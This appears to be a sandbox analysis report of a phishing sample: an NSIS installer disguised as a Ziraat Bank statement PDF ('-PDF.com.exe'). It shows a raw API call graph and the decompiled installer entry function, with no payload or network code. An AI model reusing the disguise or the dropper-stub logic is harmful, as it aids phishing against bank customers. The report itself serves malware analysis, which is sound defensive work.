4505 401bf1 4504->4505 4506 401c16 GlobalAlloc 4504->4506 4510 40239d 4505->4510 4523 406668 lstrcpynW 4505->4523 4508 4066a5 17 API calls 4506->4508 4507 4066a5 17 API calls 4509 402397 4507->4509 4508->4513 4517 405cc8 MessageBoxIndirectW 4509->4517 4521 406668 lstrcpynW 4511->4521 4513->4507 4513->4510 4515 401c03 GlobalFree 4515->4510 4516 401bce 4522 406668 lstrcpynW 4516->4522 4517->4510 4519 401bdd 4524 406668 lstrcpynW 4519->4524 4521->4516 4522->4519 4523->4515 4524->4510 4525 40261c 4526 402da6 17 API calls 4525->4526 4527 402623 4526->4527 4530 406158 GetFileAttributesW CreateFileW 4527->4530 4529 40262f 4530->4529 4538 40149e 4539 4014ac PostQuitMessage 4538->4539 4540 40239d 4538->4540 4539->4540 4541 40259e 4551 402de6 4541->4551 4544 402d84 17 API calls 4545 4025b1 4544->4545 4546 4025d9 RegEnumValueW 4545->4546 4547 4025cd RegEnumKeyW 4545->4547 4549 40292e 4545->4549 4548 4025ee RegCloseKey 4546->4548 4547->4548 4548->4549 4552 402da6 17 API calls 4551->4552 4553 402dfd 4552->4553 4554 4064d5 RegOpenKeyExW 4553->4554 4555 4025a8 4554->4555 4555->4544 4556 4015a3 4557 402da6 17 API calls 4556->4557 4558 4015aa SetFileAttributesW 4557->4558 4559 4015bc 4558->4559 3755 401fa4 3756 402da6 17 API calls 3755->3756 3757 401faa 3756->3757 3758 4056ca 24 API calls 3757->3758 3759 401fb4 3758->3759 3760 405c4b 2 API calls 3759->3760 3761 401fba 3760->3761 3762 401fdd CloseHandle 3761->3762 3766 40292e 3761->3766 3770 406ae0 WaitForSingleObject 3761->3770 3762->3766 3765 401fcf 3767 401fd4 3765->3767 3768 401fdf 3765->3768 3775 4065af wsprintfW 3767->3775 3768->3762 3771 406afa 3770->3771 3772 406b0c GetExitCodeProcess 3771->3772 3773 406a71 2 API calls 3771->3773 3772->3765 3774 406b01 WaitForSingleObject 3773->3774 3774->3771 3775->3762 3875 403c25 3876 403c40 3875->3876 3877 403c36 CloseHandle 3875->3877 3878 403c54 3876->3878 3879 403c4a CloseHandle 3876->3879 3877->3876 3884 403c82 3878->3884 3879->3878 3882 405d74 67 API calls 3883 403c65 3882->3883 3885 403c90 3884->3885 3886 403c59 3885->3886 3887 403c95 FreeLibrary GlobalFree 3885->3887 3886->3882 3887->3886 3887->3887 4560 40202a 4561 402da6 17 API calls 4560->4561 4562 402031 4561->4562 4563 406a35 5 API calls 4562->4563 4564 402040 4563->4564 4565 40205c GlobalAlloc 4564->4565 4566 4020cc 4564->4566 4565->4566 4567 402070 4565->4567 4568 406a35 5 API calls 4567->4568 4569 402077 4568->4569 4570 406a35 5 API calls 4569->4570 4571 402081 4570->4571 4571->4566 4575 4065af wsprintfW 4571->4575 4573 4020ba 4576 4065af wsprintfW 4573->4576 4575->4573 4576->4566 4577 40252a 4578 402de6 17 API calls 4577->4578 4579 402534 4578->4579 4580 402da6 17 API calls 4579->4580 4581 40253d 4580->4581 4582 402548 RegQueryValueExW 4581->4582 4585 40292e 4581->4585 4583 40256e RegCloseKey 4582->4583 4584 402568 4582->4584 4583->4585 4584->4583 4588 4065af wsprintfW 4584->4588 4588->4583 4589 4021aa 4590 402da6 17 API calls 4589->4590 4591 4021b1 4590->4591 4592 402da6 17 API calls 4591->4592 4593 4021bb 4592->4593 4594 402da6 17 API calls 4593->4594 4595 4021c5 4594->4595 4596 402da6 17 API calls 4595->4596 4597 4021cf 4596->4597 4598 402da6 17 API calls 4597->4598 4599 4021d9 4598->4599 4600 402218 CoCreateInstance 4599->4600 4601 402da6 17 API calls 4599->4601 4604 402237 4600->4604 4601->4600 4602 401423 24 API calls 4603 4022f6 4602->4603 4604->4602 4604->4603 4612 401a30 4613 402da6 17 API calls 4612->4613 4614 401a39 ExpandEnvironmentStringsW 4613->4614 4615 401a60 4614->4615 4616 401a4d 4614->4616 4616->4615 4617 401a52 lstrcmpW 4616->4617 4617->4615 4618 405031 GetDlgItem GetDlgItem 4619 405083 7 API calls 4618->4619 4620 4052a8 4618->4620 4621 40512a DeleteObject 4619->4621 4622 40511d SendMessageW 4619->4622 4625 40538a 4620->4625 4652 405317 4620->4652 4672 404f7f SendMessageW 4620->4672 4623 405133 4621->4623 4622->4621 4624 40516a 4623->4624 4628 4066a5 17 API calls 4623->4628 4626 4045c4 18 API calls 4624->4626 4627 405436 4625->4627 4631 40529b 4625->4631 4637 4053e3 SendMessageW 4625->4637 4630 40517e 4626->4630 4632 405440 SendMessageW 4627->4632 4633 405448 4627->4633 4629 40514c SendMessageW SendMessageW 4628->4629 4629->4623 4636 4045c4 18 API calls 4630->4636 4634 40462b 8 API calls 4631->4634 4632->4633 4640 405461 4633->4640 4641 40545a ImageList_Destroy 4633->4641 4648 405471 4633->4648 4639 405637 4634->4639 4653 40518f 4636->4653 4637->4631 4643 4053f8 SendMessageW 4637->4643 4638 40537c SendMessageW 4638->4625 4644 40546a GlobalFree 4640->4644 4640->4648 4641->4640 4642 4055eb 4642->4631 4649 4055fd ShowWindow GetDlgItem ShowWindow 4642->4649 4646 40540b 4643->4646 4644->4648 4645 40526a GetWindowLongW SetWindowLongW 4647 405283 4645->4647 4657 40541c SendMessageW 4646->4657 4650 4052a0 4647->4650 4651 405288 ShowWindow 4647->4651 4648->4642 4665 4054ac 4648->4665 4677 404fff 4648->4677 4649->4631 4671 4045f9 SendMessageW 4650->4671 4670 4045f9 SendMessageW 4651->4670 4652->4625 4652->4638 4653->4645 4656 4051e2 SendMessageW 4653->4656 4658 405265 4653->4658 4659 405220 SendMessageW 4653->4659 4660 405234 SendMessageW 4653->4660 4656->4653 4657->4627 4658->4645 4658->4647 4659->4653 4660->4653 4662 4055b6 4663 4055c1 InvalidateRect 4662->4663 4666 4055cd 4662->4666 4663->4666 4664 4054da SendMessageW 4668 4054f0 4664->4668 4665->4664 4665->4668 4666->4642 4686 404f3a 4666->4686 4667 405564 SendMessageW SendMessageW 4667->4668 4668->4662 4668->4667 4670->4631 4671->4620 4673 404fa2 GetMessagePos ScreenToClient SendMessageW 4672->4673 4674 404fde SendMessageW 4672->4674 4675 404fd6 4673->4675 4676 404fdb 4673->4676 4674->4675 4675->4652 4676->4674 4689 406668 lstrcpynW 4677->4689 4679 405012 4690 4065af wsprintfW 4679->4690 4681 40501c 4682 40140b 2 API calls 4681->4682 4683 405025 4682->4683 4691 406668 lstrcpynW 4683->4691 4685 40502c 4685->4665 4692 404e71 4686->4692 4688 404f4f 4688->4642 4689->4679 4690->4681 4691->4685 4693 404e8a 4692->4693 4694 4066a5 17 API calls 4693->4694 4695 404eee 4694->4695 4696 4066a5 17 API calls 4695->4696 4697 404ef9 4696->4697 4698 4066a5 17 API calls 4697->4698 4699 404f0f lstrlenW wsprintfW SetDlgItemTextW 4698->4699 4699->4688 4705 4023b2 4706 4023ba 4705->4706 4709 4023c0 4705->4709 4707 402da6 17 API calls 4706->4707 4707->4709 4708 4023ce 4711 4023dc 4708->4711 4712 402da6 17 API calls 4708->4712 4709->4708 4710 402da6 17 API calls 4709->4710 4710->4708 4713 402da6 17 API calls 4711->4713 4712->4711 4714 4023e5 WritePrivateProfileStringW 4713->4714 4715 404734 lstrlenW 4716 404753 4715->4716 4717 404755 WideCharToMultiByte 4715->4717 4716->4717 4718 402434 4719 402467 4718->4719 4720 40243c 4718->4720 4722 402da6 17 API calls 4719->4722 4721 402de6 17 API calls 4720->4721 4723 402443 4721->4723 4724 40246e 4722->4724 4726 402da6 17 API calls 4723->4726 4728 40247b 4723->4728 4729 402e64 4724->4729 4727 402454 RegDeleteValueW RegCloseKey 4726->4727 4727->4728 4730 402e78 4729->4730 4732 402e71 4729->4732 4730->4732 4733 402ea9 4730->4733 4732->4728 4734 4064d5 RegOpenKeyExW 4733->4734 4735 402ed7 4734->4735 4736 402ee7 RegEnumValueW 4735->4736 4743 402f81 4735->4743 4745 402f0a 4735->4745 4737 402f71 RegCloseKey 4736->4737 4736->4745 4737->4743 4738 402f46 RegEnumKeyW 4739 402f4f RegCloseKey 4738->4739 4738->4745 4740 406a35 5 API calls 4739->4740 4741 402f5f 4740->4741 4741->4743 4744 402f63 RegDeleteKeyW 4741->4744 4742 402ea9 6 API calls 4742->4745 4743->4732 4744->4743 4745->4737 4745->4738 4745->4739 4745->4742 4746 401735 4747 402da6 17 API calls 4746->4747 4748 40173c SearchPathW 4747->4748 4749 401757 4748->4749 4750 404ab5 4751 404ae1 4750->4751 4752 404af2 4750->4752 4811 405cac GetDlgItemTextW 4751->4811 4754 404afe GetDlgItem 4752->4754 4759 404b5d 4752->4759 4757 404b12 4754->4757 4755 404c41 4760 404df0 4755->4760 4813 405cac GetDlgItemTextW 4755->4813 4756 404aec 4758 4068ef 5 API calls 4756->4758 4762 404b26 SetWindowTextW 4757->4762 4763 405fe2 4 API calls 4757->4763 4758->4752 4759->4755 4759->4760 4764 4066a5 17 API calls 4759->4764 4767 40462b 8 API calls 4760->4767 4766 4045c4 18 API calls 4762->4766 4768 404b1c 4763->4768 4769 404bd1 SHBrowseForFolderW 4764->4769 4765 404c71 4770 40603f 18 API calls 4765->4770 4771 404b42 4766->4771 4772 404e04 4767->4772 4768->4762 4776 405f37 3 API calls 4768->4776 4769->4755 4773 404be9 CoTaskMemFree 4769->4773 4774 404c77 4770->4774 4775 4045c4 18 API calls 4771->4775 4777 405f37 3 API calls 4773->4777 4814 406668 lstrcpynW 4774->4814 4778 404b50 4775->4778 4776->4762 4779 404bf6 4777->4779 4812 4045f9 SendMessageW 4778->4812 4782 404c2d SetDlgItemTextW 4779->4782 4787 4066a5 17 API calls 4779->4787 4782->4755 4783 404b56 4785 406a35 5 API calls 4783->4785 4784 404c8e 4786 406a35 5 API calls 4784->4786 4785->4759 4793 404c95 4786->4793 4788 404c15 lstrcmpiW 4787->4788 4788->4782 4791 404c26 lstrcatW 4788->4791 4789 404cd6 4815 406668 lstrcpynW 4789->4815 4791->4782 4792 404cdd 4794 405fe2 4 API calls 4792->4794 4793->4789 4797 405f83 2 API calls 4793->4797 4799 404d2e 4793->4799 4795 404ce3 GetDiskFreeSpaceW 4794->4795 4798 404d07 MulDiv 4795->4798 4795->4799 4797->4793 4798->4799 4801 404f3a 20 API calls 4799->4801 4809 404d9f 4799->4809 4800 404dc2 4816 4045e6 EnableWindow 4800->4816 4803 404d8c 4801->4803 4802 40140b 2 API calls 4802->4800 4805 404da1 SetDlgItemTextW 4803->4805 4806 404d91 4803->4806 4805->4809 4807 404e71 20 API calls 4806->4807 4807->4809 4808 404dde 4808->4760 4810 404a0e SendMessageW 4808->4810 4809->4800 4809->4802 4810->4760 4811->4756 4812->4783 4813->4765 4814->4784 4815->4792 4816->4808 4817 401d38 4818 402d84 17 API calls 4817->4818 4819 401d3f 4818->4819 4820 402d84 17 API calls 4819->4820 4821 401d4b GetDlgItem 4820->4821 4822 402638 4821->4822 4823 4014b8 4824 4014be 4823->4824 4825 401389 2 API calls 4824->4825 4826 4014c6 4825->4826 4827 40563e 4828 405662 4827->4828 4829 40564e 4827->4829 4832 40566a IsWindowVisible 4828->4832 4838 405681 4828->4838 4830 405654 4829->4830 4831 4056ab 4829->4831 4834 404610 SendMessageW 4830->4834 4833 4056b0 CallWindowProcW 4831->4833 4832->4831 4835 405677 4832->4835 4836 40565e 4833->4836 4834->4836 4837 404f7f 5 API calls 4835->4837 4837->4838 4838->4833 4839 404fff 4 API calls 4838->4839 4839->4831 4840 40263e 4841 402652 4840->4841 4842 40266d 4840->4842 4843 402d84 17 API calls 4841->4843 4844 402672 4842->4844 4845 40269d 4842->4845 4854 402659 4843->4854 4847 402da6 17 API calls 4844->4847 4846 402da6 17 API calls 4845->4846 4849 4026a4 lstrlenW 4846->4849 4848 402679 4847->4848 4857 40668a WideCharToMultiByte 4848->4857 4849->4854 4851 40268d lstrlenA 4851->4854 4852 4026e7 4853 4026d1 4853->4852 4855 40620a WriteFile 4853->4855 4854->4852 4854->4853 4856 406239 5 API calls 4854->4856 4855->4852 4856->4853 4857->4851

                                                    Executed Functions

                                                    Function 00403640 Relevance: 91.4, APIs: 34, Strings: 18, Instructions: 450stringfilecomCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 11 403727 5->11 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 11->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 25 40376f 21->25 25->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 38 403810-403814 36->38 39 403815-403819 36->39 47 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->47 48 40397d-403995 DeleteFileW call 4030d0 37->48 38->39 41 4038d9-4038e7 call 405f64 39->41 42 40381f-403825 39->42 41->32 58 4038e9-4038ea 41->58 45 403827-40382e 42->45 46 40383f-403878 42->46 51 403830-403833 45->51 52 403835 45->52 53 403894-4038ce 46->53 54 40387a-40387f 46->54 47->48 62 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 47->62 64 40399b-4039a1 48->64 65 403b6c-403b7a ExitProcess OleUninitialize 48->65 51->46 51->52 52->46 56 4038d0-4038d4 53->56 57 4038d6-4038d8 53->57 54->53 60 403881-403889 54->60 56->57 63 4038f9-403906 call 406668 56->63 57->41 58->32 66 403890 60->66 67 40388b-40388e 60->67 62->48 62->65 63->37 69 4039a7-4039ba call 405f64 64->69 70 403a48-403a4f call 403d17 64->70 72 403b91-403b97 65->72 73 403b7c-403b8b call 405cc8 ExitProcess 65->73 66->53 67->53 67->66 88 403a0c-403a19 69->88 89 4039bc-4039f1 69->89 83 403a54-403a57 70->83 74 403b99-403bae GetCurrentProcess OpenProcessToken 72->74 75 403c0f-403c17 72->75 80 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 74->80 81 403bdf-403bed call 406a35 74->81 84 403c19 75->84 85 403c1c-403c1f ExitProcess 75->85 80->81 95 403bfb-403c06 ExitWindowsEx 81->95 96 403bef-403bf9 81->96 83->65 84->85 90 403a1b-403a29 call 40603f 88->90 91 403a5c-403a70 call 405c33 lstrcatW 88->91 93 4039f3-4039f7 89->93 90->65 104 403a2f-403a45 call 406668 * 2 90->104 107 403a72-403a78 lstrcatW 91->107 108 403a7d-403a97 lstrcatW lstrcmpiW 91->108 98 403a00-403a08 93->98 99 4039f9-4039fe 93->99 95->75 101 403c08-403c0a call 40140b 95->101 96->95 96->101 98->93 103 403a0a 98->103 99->98 99->103 101->75 103->88 104->70 107->108 109 403b6a 108->109 110 403a9d-403aa0 108->110 109->65 112 403aa2-403aa7 call 405b99 110->112 113 403aa9 call 405c16 110->113 119 403aae-403abe SetCurrentDirectoryW 112->119 113->119 121 403ac0-403ac6 call 406668 119->121 122 403acb-403af7 call 406668 119->122 121->122 126 403afc-403b17 call 4066a5 DeleteFileW 122->126 129 403b57-403b61 126->129 130 403b19-403b29 CopyFileW 126->130 129->126 132 403b63-403b65 call 406428 129->132 130->129 131 403b2b-403b4b call 406428 call 4066a5 call 405c4b 130->131 131->129 140 403b4d-403b54 CloseHandle 131->140 132->109 140->129
                                                    C-Code - Quality: 78%
                                                    			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t119;
				intOrPtr* _t123;
				void* _t137;
				void* _t143;
				void* _t148;
				void* _t152;
				void* _t157;
				signed int _t167;
				void* _t170;
				void* _t175;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t179;
				int _t188;
				void* _t189;
				void* _t198;
				signed int _t204;
				signed int _t209;
				signed int _t214;
				signed int _t216;
				int* _t218;
				signed int _t226;
				signed int _t229;
				CHAR* _t231;
				char* _t232;
				signed int _t233;
				WCHAR* _t234;
				void* _t250;

				_t216 = 0x20;
				_t188 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x42a318 = _v324.dwBuildNumber;
				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x42a31e != 0x600) {
					_t179 = E00406A35(_t188);
					if(_t179 != _t188) {
						 *_t179(0xc00);
					}
				}
				_t231 = "UXTHEME";
				do {
					E004069C5(_t231); // executed
					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
				} while ( *_t231 != 0);
				E00406A35(0xb);
				 *0x42a264 = E00406A35(9);
				_t88 = E00406A35(7);
				if(_t88 != _t188) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x42a31c =  *0x42a31c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t188); // executed
				 *0x42a320 = _t88;
				SHGetFileInfoW(0x421708, _t188,  &_v1016, 0x2b4, _t188); // executed
				E00406668(0x429260, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t232 = L"\"C:\\Users\\alfons\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe\"";
				E00406668(_t232, _t92);
				_t94 = _t232;
				_t233 = 0x22;
				 *0x42a260 = 0x400000;
				_t250 = L"\"C:\\Users\\alfons\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe\"" - _t233; // 0x22
				if(_t250 == 0) {
					_t216 = _t233;
					_t94 =  &M00435002;
				}
				_t198 = CharNextW(E00405F64(_t94, _t216));
				_v16 = _t198;
				while(1) {
					_t97 =  *_t198;
					_t251 = _t97 - _t188;
					if(_t97 == _t188) {
						break;
					}
					_t209 = 0x20;
					__eflags = _t97 - _t209;
					if(_t97 != _t209) {
						L17:
						__eflags =  *_t198 - _t233;
						_v12 = _t209;
						if( *_t198 == _t233) {
							_v12 = _t233;
							_t198 = _t198 + 2;
							__eflags = _t198;
						}
						__eflags =  *_t198 - 0x2f;
						if( *_t198 != 0x2f) {
							L32:
							_t198 = E00405F64(_t198, _v12);
							__eflags =  *_t198 - _t233;
							if(__eflags == 0) {
								_t198 = _t198 + 2;
								__eflags = _t198;
							}
							continue;
						} else {
							_t198 = _t198 + 2;
							__eflags =  *_t198 - 0x53;
							if( *_t198 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t214 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t209 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
										L31:
										_t233 = 0x22;
										goto L32;
									}
									__eflags =  *_t198 - _t229;
									if( *_t198 == _t229) {
										 *(_t198 - 4) = _t188;
										__eflags = _t198;
										E00406668(L"C:\\Users\\alfons\\AppData\\Local\\Temp", _t198);
										L37:
										_t234 = L"C:\\Users\\alfons\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t234);
										_t116 = E0040360F(_t198, _t251);
										_t252 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E004030D0(_t254, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t188) {
												L68:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												if(_v8 == _t188) {
													if( *0x42a2f4 == _t188) {
														L77:
														_t119 =  *0x42a30c;
														if(_t119 != 0xffffffff) {
															_v24 = _t119;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
													}
													_t123 = E00406A35(4);
													if(_t123 == _t188) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t188);
														_push(_t188);
														_push(_t188);
														if( *_t123() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405CC8(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x42a27c == _t188) {
												L51:
												 *0x42a30c =  *0x42a30c | 0xffffffff;
												_v24 = E00403D17(_t264);
												goto L68;
											}
											_t218 = E00405F64(L"\"C:\\Users\\alfons\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe\"", _t188);
											if(_t218 < L"\"C:\\Users\\alfons\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe\"") {
												L48:
												_t263 = _t218 - L"\"C:\\Users\\alfons\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe\"";
												_v8 = L"Error launching installer";
												if(_t218 < L"\"C:\\Users\\alfons\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe\"") {
													_t189 = E00405C33(__eflags);
													lstrcatW(_t234, L"~nsu");
													__eflags = _t189;
													if(_t189 != 0) {
														lstrcatW(_t234, "A");
													}
													lstrcatW(_t234, L".tmp");
													_t219 = L"C:\\Users\\alfons\\Desktop";
													_t137 = lstrcmpiW(_t234, L"C:\\Users\\alfons\\Desktop");
													__eflags = _t137;
													if(_t137 == 0) {
														L67:
														_t188 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t189;
														_push(_t234);
														if(_t189 == 0) {
															E00405C16();
														} else {
															E00405B99();
														}
														SetCurrentDirectoryW(_t234);
														__eflags = L"C:\\Users\\alfons\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E00406668(L"C:\\Users\\alfons\\AppData\\Local\\Temp", _t219);
														}
														E00406668(0x42b000, _v16);
														_t201 = "A" & 0x0000ffff;
														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t143;
														_v12 = 0x1a;
														 *0x42b800 = _t143;
														do {
															E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
															DeleteFileW(0x420f08);
															__eflags = _v8;
															if(_v8 != 0) {
																_t148 = CopyFileW(L"C:\\Users\\alfons\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe", 0x420f08, 1);
																__eflags = _t148;
																if(_t148 != 0) {
																	E00406428(_t201, 0x420f08, 0);
																	E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
																	_t152 = E00405C4B(0x420f08);
																	__eflags = _t152;
																	if(_t152 != 0) {
																		CloseHandle(_t152);
																		_v8 = 0;
																	}
																}
															}
															 *0x42b800 =  *0x42b800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E00406428(_t201, _t234, 0);
														goto L67;
													}
												}
												 *_t218 = _t188;
												_t221 =  &(_t218[2]);
												_t157 = E0040603F(_t263,  &(_t218[2]));
												_t264 = _t157;
												if(_t157 == 0) {
													goto L68;
												}
												E00406668(L"C:\\Users\\alfons\\AppData\\Local\\Temp", _t221);
												E00406668(L"C:\\Users\\alfons\\AppData\\Local\\Temp", _t221);
												_v8 = _t188;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
											while( *_t218 != _t204 || _t218[1] != _t167) {
												_t218 = _t218;
												if(_t218 >= L"\"C:\\Users\\alfons\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe\"") {
													continue;
												}
												break;
											}
											_t188 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t234, 0x3fb);
										lstrcatW(_t234, L"\\Temp");
										_t170 = E0040360F(_t198, _t252);
										_t253 = _t170;
										if(_t170 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t234);
										lstrcatW(_t234, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t234);
										SetEnvironmentVariableW(L"TMP", _t234);
										_t175 = E0040360F(_t198, _t253);
										_t254 = _t175;
										if(_t175 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
									goto L29;
								}
								_t177 =  *((intOrPtr*)(_t198 + 8));
								__eflags = _t177 - 0x20;
								if(_t177 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t177 - _t188;
								if(_t177 != _t188) {
									goto L29;
								}
								goto L28;
							}
							_t178 =  *((intOrPtr*)(_t198 + 2));
							__eflags = _t178 - _t209;
							if(_t178 == _t209) {
								L23:
								 *0x42a300 = 1;
								goto L24;
							}
							__eflags = _t178 - _t188;
							if(_t178 != _t188) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t198 = _t198 + 2;
						__eflags =  *_t198 - _t209;
					} while ( *_t198 == _t209);
					goto L17;
				}
				goto L37;
			}



















































                                                    0x0040364e
                                                    0x0040364f
                                                    0x00403656
                                                    0x00403659
                                                    0x00403660
                                                    0x00403663
                                                    0x00403676
                                                    0x0040367c
                                                    0x0040367f
                                                    0x00403682
                                                    0x00403690
                                                    0x00403698
                                                    0x004036a3
                                                    0x004036bc
                                                    0x004036be
                                                    0x004036c6
                                                    0x004036c6
                                                    0x004036d1
                                                    0x004036d3
                                                    0x004036d3
                                                    0x004036e8
                                                    0x0040370d
                                                    0x0040371b
                                                    0x0040371e
                                                    0x00403725
                                                    0x0040372c
                                                    0x0040372c
                                                    0x00403725
                                                    0x0040372e
                                                    0x00403733
                                                    0x00403734
                                                    0x00403740
                                                    0x00403744
                                                    0x0040374b
                                                    0x00403759
                                                    0x0040375e
                                                    0x00403765
                                                    0x00403769
                                                    0x0040376d
                                                    0x0040376f
                                                    0x0040376f
                                                    0x0040376d
                                                    0x00403776
                                                    0x0040377d
                                                    0x00403783
                                                    0x0040379b
                                                    0x004037ab
                                                    0x004037b0
                                                    0x004037b6
                                                    0x004037bd
                                                    0x004037c4
                                                    0x004037c6
                                                    0x004037c7
                                                    0x004037d1
                                                    0x004037d8
                                                    0x004037da
                                                    0x004037dc
                                                    0x004037dc
                                                    0x004037ef
                                                    0x004037f1
                                                    0x004038eb
                                                    0x004038eb
                                                    0x004038ee
                                                    0x004038f1
                                                    0x00000000
                                                    0x00000000
                                                    0x004037fb
                                                    0x004037fc
                                                    0x004037ff
                                                    0x00403808
                                                    0x00403808
                                                    0x0040380b
                                                    0x0040380e
                                                    0x00403811
                                                    0x00403814
                                                    0x00403814
                                                    0x00403814
                                                    0x00403815
                                                    0x00403819
                                                    0x004038d9
                                                    0x004038e2
                                                    0x004038e4
                                                    0x004038e7
                                                    0x004038ea
                                                    0x004038ea
                                                    0x004038ea
                                                    0x00000000
                                                    0x0040381f
                                                    0x00403820
                                                    0x00403821
                                                    0x00403825
                                                    0x0040383f
                                                    0x00403846
                                                    0x00403859
                                                    0x0040385a
                                                    0x0040386f
                                                    0x00403874
                                                    0x00403876
                                                    0x00403878
                                                    0x00403894
                                                    0x0040389b
                                                    0x004038ae
                                                    0x004038af
                                                    0x004038c4
                                                    0x004038ca
                                                    0x004038cc
